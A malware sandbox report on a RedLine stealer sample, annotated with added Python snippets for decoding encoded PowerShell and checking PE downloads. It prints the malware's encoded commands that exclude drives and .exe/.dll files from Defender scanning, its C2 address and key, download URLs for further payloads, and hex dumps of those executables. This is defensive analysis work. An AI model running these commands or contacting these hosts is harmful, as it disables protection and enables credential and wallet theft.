
Windows Analysis Report
CryptoMiner.exe

Overview

General Information

Sample Name: CryptoMiner.exe
Analysis ID: 620659
MD5: 310eb5bd45ac9c5767d28e63ab64635b
SHA1: 4ac0d40abb71e9fcff34c8f67511fc590f495f3e
SHA256: d1d622e31d20a69fc6fea0d98996607f37f6204bb02625bfb329cfdbb8edb6e6
Tags: exe

Detection

RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
.NET source code references suspicious native API functions
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
Potential dropper URLs found in powershell memory
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Entry point lies outside standard sections
Enables debug privileges
Is looking for software installed on the system
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Detected TCP or UDP traffic on non-standard ports
Contains capabilities to detect virtual machines
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Classification

  • System is w10x64
  • CryptoMiner.exe (PID: 6428 cmdline: "C:\Users\user\Desktop\CryptoMiner.exe" MD5: 310EB5BD45AC9C5767D28E63AB64635B)
    • InstallUtil.exe (PID: 2140 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: EFEC8C379D165E3F33B536739AEE26A3)
      • fname.exe (PID: 6720 cmdline: "C:\Users\user\AppData\Local\Temp\fname.exe" MD5: C61F9A9059F8B8BD0E69F7DF4CB09786)
        • conhost.exe (PID: 6712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • AppLaunch.exe (PID: 5972 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
      • filename.exe (PID: 4584 cmdline: "C:\Users\user\AppData\Local\Temp\filename.exe" MD5: C108EBDD14A2CF40E64411792987796A)
        • cmd.exe (PID: 6560 cmdline: "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • powershell.exe (PID: 4036 cmdline: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" MD5: 95000560239032BC68B4C2FDFCDEF913)
  • cleanup
Malware configuration (RedLine, extracted from 12.0.InstallUtil.exe.400000.0.unpack): {"C2 url": ["65.21.213.209:32936"], "Bot Id": "", "Authorization Header": "a14b52bba3a0ad35d4f66edae1132d42"}
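The cmd.exe line in the process tree above carries two -EncodedCommand payloads (base64 over UTF-16LE text), which is what the "Encrypted powershell cmdline option found" signature fires on; decoding them is the first thing to do with such a line. The following Python is an added example and not part of the Joe Sandbox report: the two payloads are copied from the process tree, the abbreviated switch forms the regex accepts (-e, -ec, -enc) are the ones powershell.exe also honours, and the Defender-tampering rule is my own heuristic, not a Joe Sandbox signature.

```python
"""Decode PowerShell -EncodedCommand payloads from a process command line.

Added example; not part of the Joe Sandbox report. The two base64 blobs are
copied from the cmd.exe line in the report's process tree. The abbreviated
switch forms and the Defender-tampering rule are my own heuristics.
"""
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; the
# alternatives below cover the forms seen in the wild.
_ENC_SWITCH = re.compile(
    r'-(?:encodedcommand|encoded|enco?|ec|e)\s+"?([A-Za-z0-9+/=]{16,})"?',
    re.IGNORECASE,
)
# Defender tampering: adding exclusions or disabling a protection component.
_DEFENDER_TAMPER = re.compile(
    r"\b(?:Add|Set)-MpPreference\b.*?-(?:Exclusion(?:Path|Extension|Process)|Disable\w+)",
    re.IGNORECASE | re.DOTALL,
)

# Payloads copied from the report's process tree (PID 6560 / PID 4036).
ENC_EXCLUSION_PATH = (
    "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAA"
    "KAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYA"
    "ZQApACAALQBGAG8AcgBjAGUA"
)
ENC_EXCLUSION_EXT = (
    "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMA"
    "aQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
)
# The cmd.exe command line as recorded in the process tree.
SAMPLE_CMDLINE = (
    f'"cmd" cmd /c powershell -EncodedCommand "{ENC_EXCLUSION_PATH}" '
    f'& powershell -EncodedCommand "{ENC_EXCLUSION_EXT}" & exit'
)


def decode_encoded_commands(cmdline: str) -> list:
    """Return the decoded text of every -EncodedCommand payload in cmdline."""
    decoded = []
    for blob in _ENC_SWITCH.findall(cmdline):
        try:
            raw = base64.b64decode(blob, validate=True)
            decoded.append(raw.decode("utf-16-le"))  # PowerShell encodes UTF-16LE
        except (ValueError, UnicodeDecodeError):
            continue  # not a valid payload: skip it instead of aborting triage
    return decoded


def defender_tampering(script: str) -> bool:
    """True if the decoded script adds Defender exclusions or disables a component."""
    return _DEFENDER_TAMPER.search(script) is not None


def triage(cmdline: str) -> list:
    """Pair each decoded payload with a tampering verdict."""
    return [{"script": s, "defender_tampering": defender_tampering(s)}
            for s in decode_encoded_commands(cmdline)]


if __name__ == "__main__":
    for entry in triage(SAMPLE_CMDLINE):
        print(entry)
```

Both payloads decode to Add-MpPreference calls: the first excludes the user profile and the entire system drive from Defender scanning, the second excludes every .exe and .dll. Neither string appears in clear text on the command line, so a process-creation rule that looks for "Add-MpPreference" must decode -EncodedCommand first, or rely on PowerShell script block logging (event 4104), which records the decoded script.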
Yara matches in the PCAP
Source | Rule | Description | Author
dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security

Yara matches in memory dumps
Source | Rule | Description | Author
00000000.00000003.538097603.000000000D730000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000000.00000003.538097603.000000000D730000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  Strings:
  • 0xd20:$pat14: , CommandLine:
  • 0x13958:$v2_1: ListOfProcesses
  • 0x136a7:$v4_3: base64str
  • 0x143b6:$v4_4: stringKey
  • 0x11e17:$v4_5: BytesToStringConverted
  • 0x10931:$v4_6: FromBase64
  • 0x1237a:$v4_8: procName
00000000.00000003.543077511.000000000D732000.00000040.00000800.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(7 further entries not shown)

Yara matches in unpacked PE files
Source | Rule | Description | Author
0.3.CryptoMiner.exe.d730000.1.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
0.3.CryptoMiner.exe.d730000.1.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  Strings:
  • 0xd20:$pat14: , CommandLine:
  • 0x13958:$v2_1: ListOfProcesses
  • 0x136a7:$v4_3: base64str
  • 0x143b6:$v4_4: stringKey
  • 0x11e17:$v4_5: BytesToStringConverted
  • 0x10931:$v4_6: FromBase64
  • 0x1237a:$v4_8: procName
12.2.InstallUtil.exe.400000.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
12.2.InstallUtil.exe.400000.0.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  Strings:
  • 0xd20:$pat14: , CommandLine:
  • 0x13958:$v2_1: ListOfProcesses
  • 0x136a7:$v4_3: base64str
  • 0x143b6:$v4_4: stringKey
  • 0x11e17:$v4_5: BytesToStringConverted
  • 0x10931:$v4_6: FromBase64
  • 0x1237a:$v4_8: procName
12.0.InstallUtil.exe.400000.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
(11 further entries not shown)

No Sigma rule has matched
Snort IDS alerts (sorted by timestamp; every alert has classtype "A Network Trojan was detected", and all belong to the C2 session 192.168.2.5:49796 <-> 65.21.213.209:32936 listed under Networking)

Timestamp                 SID      Src port  Dst port  Proto
05/05/22-03:30:32.990118  2850027  49796     32936     TCP
05/05/22-03:30:34.048200  2850286  49796     32936     TCP
05/05/22-03:30:34.088289  2850353  32936     49796     TCP
05/05/22-03:30:40.973991  2850286  49796     32936     TCP
05/05/22-03:30:46.265169  2850286  49796     32936     TCP
05/05/22-03:30:46.475836  2850286  49796     32936     TCP
05/05/22-03:30:51.349484  2850286  49796     32936     TCP
05/05/22-03:30:51.428831  2850286  49796     32936     TCP
05/05/22-03:30:51.508362  2850286  49796     32936     TCP
05/05/22-03:30:51.576541  2850286  49796     32936     TCP
05/05/22-03:30:51.712280  2850286  49796     32936     TCP
05/05/22-03:30:52.519175  2850286  49796     32936     TCP
05/05/22-03:30:52.800684  2850286  49796     32936     TCP
05/05/22-03:30:52.844061  2850286  49796     32936     TCP
05/05/22-03:30:52.885401  2850286  49796     32936     TCP
05/05/22-03:30:54.158486  2850286  49796     32936     TCP
05/05/22-03:30:54.711716  2850286  49796     32936     TCP
05/05/22-03:30:54.760590  2850286  49796     32936     TCP
05/05/22-03:30:54.966150  2850286  49796     32936     TCP
05/05/22-03:30:55.007583  2850286  49796     32936     TCP
05/05/22-03:30:55.048172  2850286  49796     32936     TCP

AV Detection

Source: http://45.9.20.31/rigx.exe | Avira URL Cloud: Label: malware
Source: http://45.9.20.31/asdasdasd.exe | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\filename.exe | Avira: detection malicious, Label: HEUR/AGEN.1221911
Source: C:\Users\user\AppData\Local\Temp\fname.exe | Avira: detection malicious, Label: TR/AD.GenSteal.jziki
Source: 12.0.InstallUtil.exe.400000.0.unpack | Malware Configuration Extractor: RedLine {"C2 url": ["65.21.213.209:32936"], "Bot Id": "", "Authorization Header": "a14b52bba3a0ad35d4f66edae1132d42"}
Source: CryptoMiner.exe | ReversingLabs: Detection: 16%
Source: C:\Users\user\AppData\Local\Temp\filename.exe | Metadefender: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\filename.exe | ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\Local\Temp\fname.exe | Metadefender: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\fname.exe | ReversingLabs: Detection: 69%
Source: CryptoMiner.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\filename.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\fname.exe | Joe Sandbox ML: detected
Source: CryptoMiner.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log
Source: CryptoMiner.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\At8uAy02fG4K0d\a4ma7t7o\T3MNiT0siyfS.pdb | source: CryptoMiner.exe
Source: Binary string: s.pdB | source: filename.exe.12.dr

Networking

Source: Traffic | Snort IDS: 2850027 ETPRO TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.5:49796 -> 65.21.213.209:32936
Source: Traffic | Snort IDS: 2850286 ETPRO TROJAN Redline Stealer TCP CnC Activity 192.168.2.5:49796 -> 65.21.213.209:32936
Source: Traffic | Snort IDS: 2850353 ETPRO MALWARE Redline Stealer TCP CnC - Id1Response 65.21.213.209:32936 -> 192.168.2.5:49796
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | DNS query: name: ip-api.com
Source: powershell.exe, 0000001D.00000002.698158911.000001C92E7EF000.00000004.00000800.00020000.00000000.sdmp | String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateDatah
Source: powershell.exe, 0000001D.00000002.698158911.000001C92E7EF000.00000004.00000800.00020000.00000000.sdmp | String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsolete
Source: powershell.exe, 0000001D.00000002.698158911.000001C92E7EF000.00000004.00000800.00020000.00000000.sdmp | String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery
Source: global traffic | HTTP traffic detected: GET /asdasdasd.exe HTTP/1.1 | Host: 45.9.20.31 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /rigx.exe HTTP/1.1 | Host: 45.9.20.31
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 05 May 2022 01:30:55 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 29 Apr 2022 17:53:48 GMTETag: "381d98-5ddceb97b6ef9"Accept-Ranges: bytesContent-Length: 3677592Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6b 5c 38 f4 2f 3d 56 a7 2f 3d 56 a7 2f 3d 56 a7 3b 56 55 a6 21 3d 56 a7 3b 56 53 a6 87 3d 56 a7 3b 56 52 a6 39 3d 56 a7 7d 48 52 a6 3e 3d 56 a7 7d 48 55 a6 3b 3d 56 a7 7d 48 53 a6 65 3d 56 a7 3b 56 57 a6 2a 3d 56 a7 2f 3d 57 a7 72 3d 56 a7 93 48 53 a6 2e 3d 56 a7 93 48 54 a6 2e 3d 56 a7 52 69 63 68 2f 3d 56 a7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 29 01 00 00 d0 03 00 00 dd 02 00 00 e0 00 02 01 0b 01 b8 1d 00 b2 12 00 00 4a 02 00 00 00 00 00 b1 30 22 00 00 10 00 00 00 d0 12 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 57 02 00 00 06 00 00 00 00 00 00 00 00 e0 37 00 00 04 00 00 ff 02 00 00 03 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 39 60 15 00 50 00 00 00 00 d0 37 00 db 08 00 00 00 00 00 00 00 00 00 00 68 d4 37 00 30 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4a 49 43 65 62 6f 51 00 35 5e 10 00 00 10 00 00 00 60 10 00 00 04 00 00 84 02 00 00 61 03 00 00 63 03 f7 00 20 00 00 60 7a 
63 50 6c 74 00 00 00 75 50 02 00 00 70 10 00 00 52 02 00 00 64 10 00 6d 01 00 00 0b 03 00 00 7d 03 54 02 20 00 00 60 72 72 46 35 74 61 00 00 a0 f3 01 00 00 d0 12 00 00 f4 01 00 00 b6 12 00 df 01 00 00 3f 00 00 00 2e 00 b8 02 40 00 00 40 49 4b 62 67 61 00 00 00 f0 1c 00 00 00 d0 14 00 00 10 00 00 00 aa 14 00 1c 03 00 00 bb 02 00 00 ee 02 5b 01 40 00 00 c0 30 33 41 41 6f 63 00 00 dc 2d 00 00 00 f0 14 00 00 2e 00 00 00 ba 14 00 fc 01 00 00 57 02 00 00 1a 02 32 03 40 00 00 42 36 6d 61 54 71 77 00 00 00 40 00 00 00 20 15 00 00 40 00 00 00 e8 14 00 0a 01 00 00 9b 02 00 00 08 03 b2 01 40 00 00 c0 50 4b 6d 59 74 61 00 00 00 10 00 00 00 60 15 00 00 02 00 00 00 28 15 00 5c 03 00 00 4f 03 00 00 c0 03 3d 03 40 00 00 c0 67 54 78 31 71 77 00 00 00 60 22 00 00 70 15 00 00 60 22 00 00 2a 15 00 3e 01 00 00 75 02 00 00 39 03 e4 03 60 00 00 e0 39 59 52 74 63 00 00 00 db 08 00 00 00 d0 37 00 00 0a 00 00 00 8a 37 00 6b 00 00 00 15 00 00 00 5c 00 d1 02 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 05 May 2022 01:30:58 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 21 Apr 2022 17:31:37 GMTETag: "4a7400-5dd2d7b6f9253"Accept-Ranges: bytesContent-Length: 4879360Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 53 94 61 62 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0b 00 00 6c 4a 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 4a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 4a 00 f6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b0 6b 4a 00 00 20 00 00 00 6c 4a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f6 05 00 00 00 a0 4a 00 00 06 00 00 00 6e 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 02 00 05 00 04 fe 49 00 ac 8d 00 00 01 00 00 00 3b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 f3 02 a8 ee 4f 1c c4 eb 33 07 16 13 14 d9 37 48 ba 9a 90 8f 0f 21 25 d8 ac ec b2 67 fc 9c 13 7b f5 4e ed 17 3f ea 18 79 89 c3 bd 87 14 1e 33 93 d9 1f de c2 6e e7 f1 39 f1 5d 27 8a 9f ec 0f 55 5d bb 38 57 38 fe c9 34 3a 11 0b 29 a4 8f ef 2e 39 b4 50 ca 72 64 0e f3 22 6f 7e 6e b5 8d 8f ea 4b e8 15 2a c5 9b 89 1e c7 82 61 6e 86 ab 96 ec 1d fa a7 76 45 e1 0e dc 60 2f 4e 88 ac e5 5e 97 ba c0 48 e5 c7 88 9b 1e 0e e8 1c 6e 65 14 27 f6 be 57 8b 14 5c 54 10 ba c3 86 c9 40 de 5b 06 7f 05 46 a8 32 b5 d0 be 98 63 5d af f6 75 88 b5 49 cf 67 12 4d 0d ab 20 24 c7 3e a7 97 77 d7 49 6c 40 21 20 3d 3b 8e 6a 9e 08 2d 81 80 64 20 aa 5c 34 08 c3 47 40 3d 06 cd 70 3f cd 91 42 37 17 e3 ce 43 94 6b d4 4a 7a 83 0b 1c 32 72 7e b7 60 dd ab 6d b9 f2 9c cc bb db a1 8e 1e 88 49 6e 5d c0 fb 87 64 c1 d8 f1 51 bb a1 5d 00 22 de db e4 66 49 d6 75 eb c9 f5 82 0b 2c 0e 39 cf e1 93 70 5a 8c 8f 42 c1 69 49 6a 9b 0d 92 99 cd 15 a5 02 3b 63 cd 3c 33 a3 65 3e ef 79 94 1c 67 b5 ab fe 1d 54 66 5a a3 4d f8 c5 26
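Both HTTP/1.1 200 responses above begin with an MZ/PE image, which is what the "Downloads executable code via HTTP" signature reports. The following Python is an added example, not part of the Joe Sandbox report: it pulls the COFF header fields out of a response body and judges the download by content rather than by the Content-Type the server declared. SAMPLE_BODY is the first 0x9c bytes of the second response (Content-Length 4879360), transcribed from the hex dump above; the HTML body and the truncated body used as negative cases are constructed for the example.

```python
"""Triage an HTTP response body that may carry a PE image.

Added example; not part of the Joe Sandbox report. SAMPLE_BODY is the first
0x9c bytes of the second "HTTP/1.1 200 OK" response in the Networking section
(Content-Length 4879360), transcribed from the report's hex dump. The HTML
and truncated bodies in the usage/test are constructed negative cases.
"""
import struct
from datetime import datetime, timezone
from typing import Optional

MACHINES = {0x014C: "i386", 0x8664: "AMD64", 0x01C4: "ARM", 0xAA64: "ARM64"}
# Content types under which a server honestly labels a Windows executable.
EXE_CONTENT_TYPES = {
    "application/x-msdos-program",
    "application/x-msdownload",
    "application/vnd.microsoft.portable-executable",
}

SAMPLE_BODY = bytes.fromhex(
    "4d5a90000300000004000000ffff0000"  # 0x00: "MZ" DOS header
    "b8000000000000004000000000000000"
    "00000000000000000000000000000000"
    "00000000000000000000000080000000"  # 0x3c: e_lfanew = 0x80
    "0e1fba0e00b409cd21b8014ccd215468"  # DOS stub: "This program cannot be run in DOS mode."
    "69732070726f6772616d2063616e6e6f"
    "742062652072756e20696e20444f5320"
    "6d6f64652e0d0d0a2400000000000000"
    "50450000648602005394616200000000"  # 0x80: "PE\0\0", Machine, NumberOfSections, TimeDateStamp
    "00000000f00022000b020b00"          # SizeOfOptionalHeader, Characteristics, optional magic
)


def parse_pe_header(body: bytes) -> Optional[dict]:
    """Return COFF header fields if body starts with a PE image, else None.

    Every offset is bounds-checked so a truncated or hostile body cannot raise.
    """
    if len(body) < 0x40 or body[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", body, 0x3C)[0]
    if e_lfanew + 26 > len(body) or body[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    (machine, nsections, timestamp, _symtab, _nsyms,
     opt_size, chars) = struct.unpack_from("<HHIIIHH", body, e_lfanew + 4)
    # Optional header magic distinguishes PE32 (0x10b) from PE32+ (0x20b).
    magic = struct.unpack_from("<H", body, e_lfanew + 24)[0] if opt_size >= 2 else 0
    return {
        "e_lfanew": e_lfanew,
        "machine": MACHINES.get(machine, hex(machine)),
        "sections": nsections,
        "timestamp": timestamp,
        "compiled": datetime.fromtimestamp(timestamp, tz=timezone.utc).isoformat(),
        "format": {0x10B: "PE32", 0x20B: "PE32+"}.get(magic, hex(magic)),
        "dll": bool(chars & 0x2000),  # IMAGE_FILE_DLL
    }


def download_verdict(content_type: str, body: bytes) -> str:
    """Judge a download by its bytes, not by the Content-Type the server chose."""
    if parse_pe_header(body) is None:
        return "not-pe"
    declared = content_type.split(";")[0].strip().lower()
    return "pe" if declared in EXE_CONTENT_TYPES else "pe-mislabelled"


if __name__ == "__main__":
    print(parse_pe_header(SAMPLE_BODY))
    print(download_verdict("application/x-msdos-program", SAMPLE_BODY))
```

For this body the header reads AMD64, PE32+, two sections (.text and .rsrc are visible further into the dump) and a link timestamp of 0x62619453, i.e. 2022-04-21 17:28:51 UTC, a few minutes before the Last-Modified date the server sent; that agreement is a cheap consistency check that the timestamp was not rewritten. The first response (e_lfanew 0x100, machine 0x014c, nine sections) parses the same way once its full header bytes are supplied.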
Source: Joe Sandbox View | ASN Name: CP-ASDE
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: global traffic | TCP traffic: 192.168.2.5:49796 -> 65.21.213.209:32936
Source: InstallUtil.exe, 0000000C.00000002.659462830.0000000002F67000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://45.9.20.31
